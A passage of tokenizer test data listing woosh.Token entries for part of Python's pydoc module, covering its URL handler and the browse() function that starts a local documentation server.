woosh.Token(woosh.DEDENT, ' ', 2657, 0, 2657, 20),
woosh.Token(woosh.NAME, 'except', 2657, 20, 2657, 26),
woosh.Token(woosh.NAME, 'ValueError', 2657, 27, 2657, 37),
woosh.Token(woosh.OP, ':', 2657, 37, 2657, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2657, 38, 2658, 0),
woosh.Token(woosh.INDENT, ' ', 2658, 0, 2658, 24),
woosh.Token(woosh.NAME, 'title', 2658, 24, 2658, 29),
woosh.Token(woosh.OP, ',', 2658, 29, 2658, 30),
woosh.Token(woosh.NAME, 'content', 2658, 31, 2658, 38),
woosh.Token(woosh.OP, '=', 2658, 39, 2658, 40),
woosh.Token(woosh.NAME, 'html_getobj', 2658, 41, 2658, 52),
woosh.Token(woosh.OP, '(', 2658, 52, 2658, 53),
woosh.Token(woosh.NAME, 'url', 2658, 53, 2658, 56),
woosh.Token(woosh.OP, ')', 2658, 56, 2658, 57),
woosh.Token(woosh.NEWLINE, '\r\n', 2658, 57, 2659, 0),
woosh.Token(woosh.DEDENT, ' ', 2659, 0, 2659, 16),
woosh.Token(woosh.DEDENT, '', 2659, 16, 2659, 16),
woosh.Token(woosh.NAME, 'elif', 2659, 16, 2659, 20),
woosh.Token(woosh.NAME, 'op', 2659, 21, 2659, 23),
woosh.Token(woosh.OP, '==', 2659, 24, 2659, 26),
woosh.Token(woosh.STRING, '"get?key"', 2659, 27, 2659, 36),
woosh.Token(woosh.OP, ':', 2659, 36, 2659, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2659, 37, 2660, 0),
woosh.Token(woosh.COMMENT, '# try objects first, then topics.', 2660, 20, 2660, 53),
woosh.Token(woosh.INDENT, ' ', 2661, 0, 2661, 20),
woosh.Token(woosh.NAME, 'if', 2661, 20, 2661, 22),
woosh.Token(woosh.NAME, 'url', 2661, 23, 2661, 26),
woosh.Token(woosh.NAME, 'in', 2661, 27, 2661, 29),
woosh.Token(woosh.OP, '(', 2661, 30, 2661, 31),
woosh.Token(woosh.STRING, '""', 2661, 31, 2661, 33),
woosh.Token(woosh.OP, ',', 2661, 33, 2661, 34),
woosh.Token(woosh.STRING, '"index"', 2661, 35, 2661, 42),
woosh.Token(woosh.OP, ')', 2661, 42, 2661, 43),
woosh.Token(woosh.OP, ':', 2661, 43, 2661, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 2661, 44, 2662, 0),
woosh.Token(woosh.INDENT, ' ', 2662, 0, 2662, 24),
woosh.Token(woosh.NAME, 'title', 2662, 24, 2662, 29),
woosh.Token(woosh.OP, ',', 2662, 29, 2662, 30),
woosh.Token(woosh.NAME, 'content', 2662, 31, 2662, 38),
woosh.Token(woosh.OP, '=', 2662, 39, 2662, 40),
woosh.Token(woosh.NAME, 'html_index', 2662, 41, 2662, 51),
woosh.Token(woosh.OP, '(', 2662, 51, 2662, 52),
woosh.Token(woosh.OP, ')', 2662, 52, 2662, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2662, 53, 2663, 0),
woosh.Token(woosh.DEDENT, ' ', 2663, 0, 2663, 20),
woosh.Token(woosh.NAME, 'else', 2663, 20, 2663, 24),
woosh.Token(woosh.OP, ':', 2663, 24, 2663, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2663, 25, 2664, 0),
woosh.Token(woosh.INDENT, ' ', 2664, 0, 2664, 24),
woosh.Token(woosh.NAME, 'try', 2664, 24, 2664, 27),
woosh.Token(woosh.OP, ':', 2664, 27, 2664, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2664, 28, 2665, 0),
woosh.Token(woosh.INDENT, ' ', 2665, 0, 2665, 28),
woosh.Token(woosh.NAME, 'title', 2665, 28, 2665, 33),
woosh.Token(woosh.OP, ',', 2665, 33, 2665, 34),
woosh.Token(woosh.NAME, 'content', 2665, 35, 2665, 42),
woosh.Token(woosh.OP, '=', 2665, 43, 2665, 44),
woosh.Token(woosh.NAME, 'html_getobj', 2665, 45, 2665, 56),
woosh.Token(woosh.OP, '(', 2665, 56, 2665, 57),
woosh.Token(woosh.NAME, 'url', 2665, 57, 2665, 60),
woosh.Token(woosh.OP, ')', 2665, 60, 2665, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 2665, 61, 2666, 0),
woosh.Token(woosh.DEDENT, ' ', 2666, 0, 2666, 24),
woosh.Token(woosh.NAME, 'except', 2666, 24, 2666, 30),
woosh.Token(woosh.NAME, 'ValueError', 2666, 31, 2666, 41),
woosh.Token(woosh.OP, ':', 2666, 41, 2666, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2666, 42, 2667, 0),
woosh.Token(woosh.INDENT, ' ', 2667, 0, 2667, 28),
woosh.Token(woosh.NAME, 'title', 2667, 28, 2667, 33),
woosh.Token(woosh.OP, ',', 2667, 33, 2667, 34),
woosh.Token(woosh.NAME, 'content', 2667, 35, 2667, 42),
woosh.Token(woosh.OP, '=', 2667, 43, 2667, 44),
woosh.Token(woosh.NAME, 'html_topicpage', 2667, 45, 2667, 59),
woosh.Token(woosh.OP, '(', 2667, 59, 2667, 60),
woosh.Token(woosh.NAME, 'url', 2667, 60, 2667, 63),
woosh.Token(woosh.OP, ')', 2667, 63, 2667, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2667, 64, 2668, 0),
woosh.Token(woosh.DEDENT, ' ', 2668, 0, 2668, 16),
woosh.Token(woosh.DEDENT, '', 2668, 16, 2668, 16),
woosh.Token(woosh.DEDENT, '', 2668, 16, 2668, 16),
woosh.Token(woosh.NAME, 'else', 2668, 16, 2668, 20),
woosh.Token(woosh.OP, ':', 2668, 20, 2668, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2668, 21, 2669, 0),
woosh.Token(woosh.INDENT, ' ', 2669, 0, 2669, 20),
woosh.Token(woosh.NAME, 'raise', 2669, 20, 2669, 25),
woosh.Token(woosh.NAME, 'ValueError', 2669, 26, 2669, 36),
woosh.Token(woosh.OP, '(', 2669, 36, 2669, 37),
woosh.Token(woosh.STRING, "'bad pydoc url'", 2669, 37, 2669, 52),
woosh.Token(woosh.OP, ')', 2669, 52, 2669, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2669, 53, 2670, 0),
woosh.Token(woosh.DEDENT, ' ', 2670, 0, 2670, 12),
woosh.Token(woosh.DEDENT, '', 2670, 12, 2670, 12),
woosh.Token(woosh.NAME, 'else', 2670, 12, 2670, 16),
woosh.Token(woosh.OP, ':', 2670, 16, 2670, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2670, 17, 2671, 0),
woosh.Token(woosh.INDENT, ' ', 2671, 0, 2671, 16),
woosh.Token(woosh.NAME, 'title', 2671, 16, 2671, 21),
woosh.Token(woosh.OP, ',', 2671, 21, 2671, 22),
woosh.Token(woosh.NAME, 'content', 2671, 23, 2671, 30),
woosh.Token(woosh.OP, '=', 2671, 31, 2671, 32),
woosh.Token(woosh.NAME, 'html_getobj', 2671, 33, 2671, 44),
woosh.Token(woosh.OP, '(', 2671, 44, 2671, 45),
woosh.Token(woosh.NAME, 'url', 2671, 45, 2671, 48),
woosh.Token(woosh.OP, ')', 2671, 48, 2671, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2671, 49, 2672, 0),
woosh.Token(woosh.DEDENT, ' ', 2672, 0, 2672, 8),
woosh.Token(woosh.DEDENT, '', 2672, 8, 2672, 8),
woosh.Token(woosh.NAME, 'except', 2672, 8, 2672, 14),
woosh.Token(woosh.NAME, 'Exception', 2672, 15, 2672, 24),
woosh.Token(woosh.NAME, 'as', 2672, 25, 2672, 27),
woosh.Token(woosh.NAME, 'exc', 2672, 28, 2672, 31),
woosh.Token(woosh.OP, ':', 2672, 31, 2672, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2672, 32, 2673, 0),
woosh.Token(woosh.COMMENT, '# Catch any errors and display them in an error page.', 2673, 12, 2673, 65),
woosh.Token(woosh.INDENT, ' ', 2674, 0, 2674, 12),
woosh.Token(woosh.NAME, 'title', 2674, 12, 2674, 17),
woosh.Token(woosh.OP, ',', 2674, 17, 2674, 18),
woosh.Token(woosh.NAME, 'content', 2674, 19, 2674, 26),
woosh.Token(woosh.OP, '=', 2674, 27, 2674, 28),
woosh.Token(woosh.NAME, 'html_error', 2674, 29, 2674, 39),
woosh.Token(woosh.OP, '(', 2674, 39, 2674, 40),
woosh.Token(woosh.NAME, 'complete_url', 2674, 40, 2674, 52),
woosh.Token(woosh.OP, ',', 2674, 52, 2674, 53),
woosh.Token(woosh.NAME, 'exc', 2674, 54, 2674, 57),
woosh.Token(woosh.OP, ')', 2674, 57, 2674, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2674, 58, 2675, 0),
woosh.Token(woosh.DEDENT, ' ', 2675, 0, 2675, 8),
woosh.Token(woosh.NAME, 'return', 2675, 8, 2675, 14),
woosh.Token(woosh.NAME, 'html', 2675, 15, 2675, 19),
woosh.Token(woosh.OP, '.', 2675, 19, 2675, 20),
woosh.Token(woosh.NAME, 'page', 2675, 20, 2675, 24),
woosh.Token(woosh.OP, '(', 2675, 24, 2675, 25),
woosh.Token(woosh.NAME, 'title', 2675, 25, 2675, 30),
woosh.Token(woosh.OP, ',', 2675, 30, 2675, 31),
woosh.Token(woosh.NAME, 'content', 2675, 32, 2675, 39),
woosh.Token(woosh.OP, ')', 2675, 39, 2675, 40),
woosh.Token(woosh.NEWLINE, '\r\n', 2675, 40, 2676, 0),
woosh.Token(woosh.DEDENT, ' ', 2677, 0, 2677, 4),
woosh.Token(woosh.NAME, 'if', 2677, 4, 2677, 6),
woosh.Token(woosh.NAME, 'url', 2677, 7, 2677, 10),
woosh.Token(woosh.OP, '.', 2677, 10, 2677, 11),
woosh.Token(woosh.NAME, 'startswith', 2677, 11, 2677, 21),
woosh.Token(woosh.OP, '(', 2677, 21, 2677, 22),
woosh.Token(woosh.STRING, "'/'", 2677, 22, 2677, 25),
woosh.Token(woosh.OP, ')', 2677, 25, 2677, 26),
woosh.Token(woosh.OP, ':', 2677, 26, 2677, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2677, 27, 2678, 0),
woosh.Token(woosh.INDENT, ' ', 2678, 0, 2678, 8),
woosh.Token(woosh.NAME, 'url', 2678, 8, 2678, 11),
woosh.Token(woosh.OP, '=', 2678, 12, 2678, 13),
woosh.Token(woosh.NAME, 'url', 2678, 14, 2678, 17),
woosh.Token(woosh.OP, '[', 2678, 17, 2678, 18),
woosh.Token(woosh.NUMBER, '1', 2678, 18, 2678, 19),
woosh.Token(woosh.OP, ':', 2678, 19, 2678, 20),
woosh.Token(woosh.OP, ']', 2678, 20, 2678, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2678, 21, 2679, 0),
woosh.Token(woosh.DEDENT, ' ', 2679, 0, 2679, 4),
woosh.Token(woosh.NAME, 'if', 2679, 4, 2679, 6),
woosh.Token(woosh.NAME, 'content_type', 2679, 7, 2679, 19),
woosh.Token(woosh.OP, '==', 2679, 20, 2679, 22),
woosh.Token(woosh.STRING, "'text/css'", 2679, 23, 2679, 33),
woosh.Token(woosh.OP, ':', 2679, 33, 2679, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2679, 34, 2680, 0),
woosh.Token(woosh.INDENT, ' ', 2680, 0, 2680, 8),
woosh.Token(woosh.NAME, 'path_here', 2680, 8, 2680, 17),
woosh.Token(woosh.OP, '=', 2680, 18, 2680, 19),
woosh.Token(woosh.NAME, 'os', 2680, 20, 2680, 22),
woosh.Token(woosh.OP, '.', 2680, 22, 2680, 23),
woosh.Token(woosh.NAME, 'path', 2680, 23, 2680, 27),
woosh.Token(woosh.OP, '.', 2680, 27, 2680, 28),
woosh.Token(woosh.NAME, 'dirname', 2680, 28, 2680, 35),
woosh.Token(woosh.OP, '(', 2680, 35, 2680, 36),
woosh.Token(woosh.NAME, 'os', 2680, 36, 2680, 38),
woosh.Token(woosh.OP, '.', 2680, 38, 2680, 39),
woosh.Token(woosh.NAME, 'path', 2680, 39, 2680, 43),
woosh.Token(woosh.OP, '.', 2680, 43, 2680, 44),
woosh.Token(woosh.NAME, 'realpath', 2680, 44, 2680, 52),
woosh.Token(woosh.OP, '(', 2680, 52, 2680, 53),
woosh.Token(woosh.NAME, '__file__', 2680, 53, 2680, 61),
woosh.Token(woosh.OP, ')', 2680, 61, 2680, 62),
woosh.Token(woosh.OP, ')', 2680, 62, 2680, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2680, 63, 2681, 0),
woosh.Token(woosh.NAME, 'css_path', 2681, 8, 2681, 16),
woosh.Token(woosh.OP, '=', 2681, 17, 2681, 18),
woosh.Token(woosh.NAME, 'os', 2681, 19, 2681, 21),
woosh.Token(woosh.OP, '.', 2681, 21, 2681, 22),
woosh.Token(woosh.NAME, 'path', 2681, 22, 2681, 26),
woosh.Token(woosh.OP, '.', 2681, 26, 2681, 27),
woosh.Token(woosh.NAME, 'join', 2681, 27, 2681, 31),
woosh.Token(woosh.OP, '(', 2681, 31, 2681, 32),
woosh.Token(woosh.NAME, 'path_here', 2681, 32, 2681, 41),
woosh.Token(woosh.OP, ',', 2681, 41, 2681, 42),
woosh.Token(woosh.NAME, 'url', 2681, 43, 2681, 46),
woosh.Token(woosh.OP, ')', 2681, 46, 2681, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2681, 47, 2682, 0),
woosh.Token(woosh.NAME, 'with', 2682, 8, 2682, 12),
woosh.Token(woosh.NAME, 'open', 2682, 13, 2682, 17),
woosh.Token(woosh.OP, '(', 2682, 17, 2682, 18),
woosh.Token(woosh.NAME, 'css_path', 2682, 18, 2682, 26),
woosh.Token(woosh.OP, ')', 2682, 26, 2682, 27),
woosh.Token(woosh.NAME, 'as', 2682, 28, 2682, 30),
woosh.Token(woosh.NAME, 'fp', 2682, 31, 2682, 33),
woosh.Token(woosh.OP, ':', 2682, 33, 2682, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2682, 34, 2683, 0),
woosh.Token(woosh.INDENT, ' ', 2683, 0, 2683, 12),
woosh.Token(woosh.NAME, 'return', 2683, 12, 2683, 18),
woosh.Token(woosh.STRING, "''", 2683, 19, 2683, 21),
woosh.Token(woosh.OP, '.', 2683, 21, 2683, 22),
woosh.Token(woosh.NAME, 'join', 2683, 22, 2683, 26),
woosh.Token(woosh.OP, '(', 2683, 26, 2683, 27),
woosh.Token(woosh.NAME, 'fp', 2683, 27, 2683, 29),
woosh.Token(woosh.OP, '.', 2683, 29, 2683, 30),
woosh.Token(woosh.NAME, 'readlines', 2683, 30, 2683, 39),
woosh.Token(woosh.OP, '(', 2683, 39, 2683, 40),
woosh.Token(woosh.OP, ')', 2683, 40, 2683, 41),
woosh.Token(woosh.OP, ')', 2683, 41, 2683, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2683, 42, 2684, 0),
woosh.Token(woosh.DEDENT, ' ', 2684, 0, 2684, 4),
woosh.Token(woosh.DEDENT, '', 2684, 4, 2684, 4),
woosh.Token(woosh.NAME, 'elif', 2684, 4, 2684, 8),
woosh.Token(woosh.NAME, 'content_type', 2684, 9, 2684, 21),
woosh.Token(woosh.OP, '==', 2684, 22, 2684, 24),
woosh.Token(woosh.STRING, "'text/html'", 2684, 25, 2684, 36),
woosh.Token(woosh.OP, ':', 2684, 36, 2684, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2684, 37, 2685, 0),
woosh.Token(woosh.INDENT, ' ', 2685, 0, 2685, 8),
woosh.Token(woosh.NAME, 'return', 2685, 8, 2685, 14),
woosh.Token(woosh.NAME, 'get_html_page', 2685, 15, 2685, 28),
woosh.Token(woosh.OP, '(', 2685, 28, 2685, 29),
woosh.Token(woosh.NAME, 'url', 2685, 29, 2685, 32),
woosh.Token(woosh.OP, ')', 2685, 32, 2685, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2685, 33, 2686, 0),
woosh.Token(woosh.COMMENT, '# Errors outside the url handler are caught by the server.', 2686, 4, 2686, 62),
woosh.Token(woosh.DEDENT, ' ', 2687, 0, 2687, 4),
woosh.Token(woosh.NAME, 'raise', 2687, 4, 2687, 9),
woosh.Token(woosh.NAME, 'TypeError', 2687, 10, 2687, 19),
woosh.Token(woosh.OP, '(', 2687, 19, 2687, 20),
woosh.Token(woosh.STRING, "'unknown content type %r for url %s'", 2687, 20, 2687, 56),
woosh.Token(woosh.OP, '%', 2687, 57, 2687, 58),
woosh.Token(woosh.OP, '(', 2687, 59, 2687, 60),
woosh.Token(woosh.NAME, 'content_type', 2687, 60, 2687, 72),
woosh.Token(woosh.OP, ',', 2687, 72, 2687, 73),
woosh.Token(woosh.NAME, 'url', 2687, 74, 2687, 77),
woosh.Token(woosh.OP, ')', 2687, 77, 2687, 78),
woosh.Token(woosh.OP, ')', 2687, 78, 2687, 79),
woosh.Token(woosh.NEWLINE, '\r\n', 2687, 79, 2688, 0),
woosh.Token(woosh.DEDENT, '', 2690, 0, 2690, 0),
woosh.Token(woosh.NAME, 'def', 2690, 0, 2690, 3),
woosh.Token(woosh.NAME, 'browse', 2690, 4, 2690, 10),
woosh.Token(woosh.OP, '(', 2690, 10, 2690, 11),
woosh.Token(woosh.NAME, 'port', 2690, 11, 2690, 15),
woosh.Token(woosh.OP, '=', 2690, 15, 2690, 16),
woosh.Token(woosh.NUMBER, '0', 2690, 16, 2690, 17),
woosh.Token(woosh.OP, ',', 2690, 17, 2690, 18),
woosh.Token(woosh.OP, '*', 2690, 19, 2690, 20),
woosh.Token(woosh.OP, ',', 2690, 20, 2690, 21),
woosh.Token(woosh.NAME, 'open_browser', 2690, 22, 2690, 34),
woosh.Token(woosh.OP, '=', 2690, 34, 2690, 35),
woosh.Token(woosh.NAME, 'True', 2690, 35, 2690, 39),
woosh.Token(woosh.OP, ',', 2690, 39, 2690, 40),
woosh.Token(woosh.NAME, 'hostname', 2690, 41, 2690, 49),
woosh.Token(woosh.OP, '=', 2690, 49, 2690, 50),
woosh.Token(woosh.STRING, "'localhost'", 2690, 50, 2690, 61),
woosh.Token(woosh.OP, ')', 2690, 61, 2690, 62),
woosh.Token(woosh.OP, ':', 2690, 62, 2690, 63),
woosh.Token(woosh.NEWLINE, '\r\n', 2690, 63, 2691, 0),
woosh.Token(woosh.INDENT, ' ', 2691, 0, 2691, 4),
woosh.Token(woosh.STRING, '"""Start the enhanced pydoc Web server and open a Web browser.\r\n\r\n Use port \'0\' to start the server on an arbitrary port.\r\n Set open_browser to False to suppress opening a browser.\r\n """', 2691, 4, 2695, 7),
woosh.Token(woosh.NEWLINE, '\r\n', 2695, 7, 2696, 0),
woosh.Token(woosh.NAME, 'import', 2696, 4, 2696, 10),
woosh.Token(woosh.NAME, 'webbrowser', 2696, 11, 2696, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2696, 21, 2697, 0),
woosh.Token(woosh.NAME, 'serverthread', 2697, 4, 2697, 16),
woosh.Token(woosh.OP, '=', 2697, 17, 2697, 18),
woosh.Token(woosh.NAME, '_start_server', 2697, 19, 2697, 32),
woosh.Token(woosh.OP, '(', 2697, 32, 2697, 33),
woosh.Token(woosh.NAME, '_url_handler', 2697, 33, 2697, 45),
woosh.Token(woosh.OP, ',', 2697, 45, 2697, 46),
woosh.Token(woosh.NAME, 'hostname', 2697, 47, 2697, 55),
woosh.Token(woosh.OP, ',', 2697, 55, 2697, 56),
woosh.Token(woosh.NAME, 'port', 2697, 57, 2697, 61),
woosh.Token(woosh.OP, ')', 2697, 61, 2697, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2697, 62, 2698, 0),
woosh.Token(woosh.NAME, 'if', 2698, 4, 2698, 6),
woosh.Token(woosh.NAME, 'serverthread', 2698, 7, 2698, 19),
woosh.Token(woosh.OP, '.', 2698, 19, 2698, 20),
woosh.Token(woosh.NAME, 'error', 2698, 20, 2698, 25),
woosh.Token(woosh.OP, ':', 2698, 25, 2698, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2698, 26, 2699, 0),
woosh.Token(woosh.INDENT, ' ', 2699, 0, 2699, 8),
woosh.Token(woosh.NAME, 'print', 2699, 8, 2699, 13),
woosh.Token(woosh.OP, '(', 2699, 13, 2699, 14),
woosh.Token(woosh.NAME, 'serverthread', 2699, 14, 2699, 26),
woosh.Token(woosh.OP, '.', 2699, 26, 2699, 27),
woosh.Token(woosh.NAME, 'error', 2699, 27, 2699, 32),
woosh.Token(woosh.OP, ')', 2699, 32, 2699, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2699, 33, 2700, 0),
woosh.Token(woosh.NAME, 'return', 2700, 8, 2700, 14),
woosh.Token(woosh.NEWLINE, '\r\n', 2700, 14, 2701, 0),
woosh.Token(woosh.DEDENT, ' ', 2701, 0, 2701, 4),
woosh.Token(woosh.NAME, 'if', 2701, 4, 2701, 6),
woosh.Token(woosh.NAME, 'serverthread', 2701, 7, 2701, 19),
woosh.Token(woosh.OP, '.', 2701, 19, 2701, 20),
woosh.Token(woosh.NAME, 'serving', 2701, 20, 2701, 27),
woosh.Token(woosh.OP, ':', 2701, 27, 2701, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2701, 28, 2702, 0),
woosh.Token(woosh.INDENT, ' ', 2702, 0, 2702, 8),
woosh.Token(woosh.NAME, 'server_help_msg', 2702, 8, 2702, 23),
woosh.Token(woosh.OP, '=', 2702, 24, 2702, 25),
woosh.Token(woosh.STRING, "'Server commands: [b]rowser, [q]uit'", 2702, 26, 2702, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 2702, 62, 2703, 0),
woosh.Token(woosh.NAME, 'if', 2703, 8, 2703, 10),
woosh.Token(woosh.NAME, 'open_browser', 2703, 11, 2703, 23),
woosh.Token(woosh.OP, ':', 2703, 23, 2703, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2703, 24, 2704, 0),
woosh.Token(woosh.INDENT, ' ', 2704, 0, 2704, 12),
woosh.Token(woosh.NAME, 'webbrowser', 2704, 12, 2704, 22),
woosh.Token(woosh.OP, '.', 2704, 22, 2704, 23),
woosh.Token(woosh.NAME, 'open', 2704, 23, 2704, 27),
woosh.Token(woosh.OP, '(', 2704, 27, 2704, 28),
woosh.Token(woosh.NAME, 'serverthread', 2704, 28, 2704, 40),
woosh.Token(woosh.OP, '.', 2704, 40, 2704, 41),
woosh.Token(woosh.NAME, 'url', 2704, 41, 2704, 44),
woosh.Token(woosh.OP, ')', 2704, 44, 2704, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2704, 45, 2705, 0),
woosh.Token(woosh.DEDENT, ' ', 2705, 0, 2705, 8),
woosh.Token(woosh.NAME, 'try', 2705, 8, 2705, 11),
woosh.Token(woosh.OP, ':', 2705, 11, 2705, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2705, 12, 2706, 0),
woosh.Token(woosh.INDENT, ' ', 2706, 0, 2706, 12),
woosh.Token(woosh.NAME, 'print', 2706, 12, 2706, 17),
woosh.Token(woosh.OP, '(', 2706, 17, 2706, 18),
woosh.Token(woosh.STRING, "'Server ready at'", 2706, 18, 2706, 35),
woosh.Token(woosh.OP, ',', 2706, 35, 2706, 36),
woosh.Token(woosh.NAME, 'serverthread', 2706, 37, 2706, 49),
woosh.Token(woosh.OP, '.', 2706, 49, 2706, 50),
woosh.Token(woosh.NAME, 'url', 2706, 50, 2706, 53),
woosh.Token(woosh.OP, ')', 2706, 53, 2706, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 2706, 54, 2707, 0),
woosh.Token(woosh.NAME, 'print', 2707, 12, 2707, 17),
woosh.Token(woosh.OP, '(', 2707, 17, 2707, 18),
woosh.Token(woosh.NAME, 'server_help_msg', 2707, 18, 2707, 33),
woosh.Token(woosh.OP, ')', 2707, 33, 2707, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2707, 34, 2708, 0),
woosh.Token(woosh.NAME, 'while', 2708, 12, 2708, 17),
woosh.Token(woosh.NAME, 'serverthread', 2708, 18, 2708, 30),
woosh.Token(woosh.OP, '.', 2708, 30, 2708, 31),
woosh.Token(woosh.NAME, 'serving', 2708, 31, 2708, 38),
woosh.Token(woosh.OP, ':', 2708, 38, 2708, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2708, 39, 2709, 0),
woosh.Token(woosh.INDENT, ' ', 2709, 0, 2709, 16),
woosh.Token(woosh.NAME, 'cmd', 2709, 16, 2709, 19),
woosh.Token(woosh.OP, '=', 2709, 20, 2709, 21),
woosh.Token(woosh.NAME, 'input', 2709, 22, 2709, 27),
woosh.Token(woosh.OP, '(', 2709, 27, 2709, 28),
woosh.Token(woosh.STRING, "'server> '", 2709, 28, 2709, 38),
woosh.Token(woosh.OP, ')', 2709, 38, 2709, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2709, 39, 2710, 0),
woosh.Token(woosh.NAME, 'cmd', 2710, 16, 2710, 19),
woosh.Token(woosh.OP, '=', 2710, 20, 2710, 21),
woosh.Token(woosh.NAME, 'cmd', 2710, 22, 2710, 25),
woosh.Token(woosh.OP, '.', 2710, 25, 2710, 26),
woosh.Token(woosh.NAME, 'lower', 2710, 26, 2710, 31),
woosh.Token(woosh.OP, '(', 2710, 31, 2710, 32),
woosh.Token(woosh.OP, ')', 2710, 32, 2710, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 2710, 33, 2711, 0),
woosh.Token(woosh.NAME, 'if', 2711, 16, 2711, 18),
woosh.Token(woosh.NAME, 'cmd', 2711, 19, 2711, 22),
woosh.Token(woosh.OP, '==', 2711, 23, 2711, 25),
woosh.Token(woosh.STRING, "'q'", 2711, 26, 2711, 29),
woosh.Token(woosh.OP, ':', 2711, 29, 2711, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2711, 30, 2712, 0),
woosh.Token(woosh.INDENT, ' ', 2712, 0, 2712, 20),
woosh.Token(woosh.NAME, 'break', 2712, 20, 2712, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2712, 25, 2713, 0),
woosh.Token(woosh.DEDENT, ' ', 2713, 0, 2713, 16),
woosh.Token(woosh.NAME, 'elif', 2713, 16, 2713, 20),
woosh.Token(woosh.NAME, 'cmd', 2713, 21, 2713, 24),
woosh.Token(woosh.OP, '==', 2713, 25, 2713, 27),
woosh.Token(woosh.STRING, "'b'", 2713, 28, 2713, 31),
woosh.Token(woosh.OP, ':', 2713, 31, 2713, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2713, 32, 2714, 0),
woosh.Token(woosh.INDENT, ' ', 2714, 0, 2714, 20),
woosh.Token(woosh.NAME, 'webbrowser', 2714, 20, 2714, 30),
woosh.Token(woosh.OP, '.', 2714, 30, 2714, 31),
woosh.Token(woosh.NAME, 'open', 2714, 31, 2714, 35),
woosh.Token(woosh.OP, '(', 2714, 35, 2714, 36),
woosh.Token(woosh.NAME, 'serverthread', 2714, 36, 2714, 48),
woosh.Token(woosh.OP, '.', 2714, 48, 2714, 49),
woosh.Token(woosh.NAME, 'url', 2714, 49, 2714, 52),
woosh.Token(woosh.OP, ')', 2714, 52, 2714, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2714, 53, 2715, 0),
woosh.Token(woosh.DEDENT, ' ', 2715, 0, 2715, 16),
woosh.Token(woosh.NAME, 'else', 2715, 16, 2715, 20),
woosh.Token(woosh.OP, ':', 2715, 20, 2715, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2715, 21, 2716, 0),
woosh.Token(woosh.INDENT, ' ', 2716, 0, 2716, 20),
woosh.Token(woosh.NAME, 'print', 2716, 20, 2716, 25),
woosh.Token(woosh.OP, '(', 2716, 25, 2716, 26),
woosh.Token(woosh.NAME, 'server_help_msg', 2716, 26, 2716, 41),
woosh.Token(woosh.OP, ')', 2716, 41, 2716, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 2716, 42, 2717, 0),
woosh.Token(woosh.DEDENT, ' ', 2717, 0, 2717, 8),
woosh.Token(woosh.DEDENT, '', 2717, 8, 2717, 8),
woosh.Token(woosh.DEDENT, '', 2717, 8, 2717, 8),
woosh.Token(woosh.NAME, 'except', 2717, 8, 2717, 14),
woosh.Token(woosh.OP, '(', 2717, 15, 2717, 16),
woosh.Token(woosh.NAME, 'KeyboardInterrupt', 2717, 16, 2717, 33),
woosh.Token(woosh.OP, ',', 2717, 33, 2717, 34),
woosh.Token(woosh.NAME, 'EOFError', 2717, 35, 2717, 43),
woosh.Token(woosh.OP, ')', 2717, 43, 2717, 44),
woosh.Token(woosh.OP, ':', 2717, 44, 2717, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 2717, 45, 2718, 0),
woosh.Token(woosh.INDENT, ' ', 2718, 0, 2718, 12),
woosh.Token(woosh.NAME, 'print', 2718, 12, 2718, 17),
woosh.Token(woosh.OP, '(', 2718, 17, 2718, 18),
woosh.Token(woosh.OP, ')', 2718, 18, 2718, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 2718, 19, 2719, 0),
woosh.Token(woosh.DEDENT, ' ', 2719, 0, 2719, 8),
woosh.Token(woosh.NAME, 'finally', 2719, 8, 2719, 15),
woosh.Token(woosh.OP, ':', 2719, 15, 2719, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2719, 16, 2720, 0),
woosh.Token(woosh.INDENT, ' ', 2720, 0, 2720, 12),
woosh.Token(woosh.NAME, 'if', 2720, 12, 2720, 14),
woosh.Token(woosh.NAME, 'serverthread', 2720, 15, 2720, 27),
woosh.Token(woosh.OP, '.', 2720, 27, 2720, 28),
woosh.Token(woosh.NAME, 'serving', 2720, 28, 2720, 35),
woosh.Token(woosh.OP, ':', 2720, 35, 2720, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2720, 36, 2721, 0),
woosh.Token(woosh.INDENT, ' ', 2721, 0, 2721, 16),
